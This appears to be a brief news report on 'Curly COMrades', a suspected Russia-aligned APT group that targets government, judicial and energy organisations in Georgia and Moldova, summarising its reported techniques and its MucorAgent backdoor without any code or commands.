Criminal elements are reportedly employing covert malware to infiltrate government systems
Curly COMrades, a newly identified advanced persistent threat (APT) group, has been actively targeting critical organizations in geopolitically sensitive regions such as Georgia and Moldova since mid-2024. Their primary focus has been on government and judicial entities, as well as energy companies.
The suspected connection to Russia stems from their alignment with Russian geopolitical interests. Although definitive links to any known Russian threat actors have not been established, their tactics, targets, and operational goals notably support Russian strategic objectives.
Technically, the group is distinguished by their heavy use of the curl.exe utility for command-and-control (C2) communication and the hijacking of Component Object Model (COM) objects. They employ a mix of publicly available tools (LOLBins), open-source projects, and custom malware such as a backdoor called MucorAgent to achieve stealth, persistence, and lateral movement across networks with minimal detection.
MucorAgent, a three-stage Windows malware component engineered as a .NET stealthy tool, runs hidden commands, keeps them encrypted to avoid detection, and sends the results back to the attacker.
The group's exposure was first reported by Bitdefender Labs and corroborated by other cybersecurity sources, who emphasize their role in supporting Russian state objectives through cyber espionage in critical regions experiencing geopolitical shifts.
Key Aspects of Curly COMrades
- Who they are: A new advanced persistent threat actor targeting geopolitical hotbeds since mid-2024.
- Primary targets: Government, judicial bodies, energy firms in Georgia and Moldova.
- Techniques: Credential theft (NTDS and LSASS dumps), COM hijacking, curl.exe use for C2, proxy relays, custom malware (MucorAgent).
- Connection to Russia: Aligned with Russian geopolitical goals; suspected support of Russian interests but low-confidence direct attribution.
- Operational goals: Long-term network access, data exfiltration, network control.
Curly COMrades' operations may align with the geopolitical goals of the Russian Federation, but there are no strong overlaps with known Russian APT groups. This data is current as of August 2025, reflecting ongoing monitoring and analysis in cybersecurity communities.
Read also:
- Businesses require a fresh approach to cyber defense, according to a cybersecurity expert.
- Intelligence leaders gather under Doval's leadership to counteract terrorism
- AMD's FSR 4 expands its compatibility thanks to OptiScaler's ability to convert any contemporary upscaler into FSR 4, provided that the game isn't built upon Vulkan or contains anti-cheat software, excluding such titles.
- Benefits, Nutrition, and Applications of Matcha: A Comprehensive Overview
